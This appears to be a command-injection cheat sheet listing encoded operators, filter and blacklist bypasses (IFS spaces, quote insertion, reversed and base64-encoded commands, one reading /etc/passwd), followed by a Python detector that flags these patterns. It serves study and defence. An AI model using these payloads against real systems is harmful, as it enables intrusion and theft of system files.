Notes
Injection Operators
; : %3b
\n : %0a
& : %26
| : %7c
&& : %26%26
|| : %7c%7c
`` : %60%60
$() : %24%28%29
Linux
Filtered Character Bypass
printenv
Spaces
%09 : Using tabs instead of spaces
${IFS} : Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())
{ls,-la} : Commas will be replaced with spaces
${PATH:0:1} : Will be replaced with /
${LS_COLORS:10:1} : Will be replaced with ;
$(tr '!-}' '"-~'<<<[) : Shift character by one ([ -> \)
Blacklisted Command Bypass
Character Insertion
' or " : The total number of quotes must be even
$@ or \ : Linux only
Case Manipulation
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") : Execute command regardless of case
$(a="WhOaMi";printf %s "${a,,}") : Another variation of the technique
Reversed Commands
echo 'whoami' | rev : Reverse a string
$(rev<<<'imaohw') : Execute reversed command
Encoded Commands
echo -n 'cat /etc/passwd | grep 33' | base64 : Encode a string with base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) : Execute b64 encoded string
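Seen from the defending side, the entries above double as detection signatures. The Python sketch below is an added example, not part of the original notes: it URL-decodes a parameter value and reports which of the listed techniques it matches. The rule names, the functions decode and classify, and the sample values are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Heuristic rules for the techniques listed on this page. Rule names are
# this example's own labels; tune the patterns to the parameter you protect.
RULES = [
    ("injection_operator", re.compile(r"[;\n&|`]|\$\(")),
    ("space_substitute", re.compile(r"\t|\$\{?IFS\}?|\{\w+(?:,[^{}\s]*)+\}")),
    ("env_substring", re.compile(r"\$\{\w+:\d+:\d+\}")),
    ("char_insertion", re.compile(r"\w(?:['\"]|\$@|\\)\w")),
    ("case_or_shift_tr", re.compile(r"\btr\b|\$\{\w+,,\}")),
    ("reversed_command", re.compile(r"\brev\b")),
    ("encoded_command", re.compile(r"\bbase64\s+(?:-d|--decode)")),
]

def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded operators (%253b) are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return the names of all rules that match the decoded value."""
    text = decode(value)
    return [name for name, rx in RULES if rx.search(text)]

# Constructed sample values for a parameter that should hold an IP address.
SAMPLES = [
    "127.0.0.1",
    "127.0.0.1%0a{ls,-la}",
    "127.0.0.1%0als${IFS}${PATH:0:1}tmp",
    "127.0.0.1%0aw'h'o'am'i",
    "127.0.0.1%253b$(rev<<<'imaohw')",
    '$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:42} -> {classify(sample) or 'clean'}")
```

Matching is heuristic and only suits parameters that should never contain shell syntax. The durable fix is allowlist validation of the value plus invoking the program without a shell.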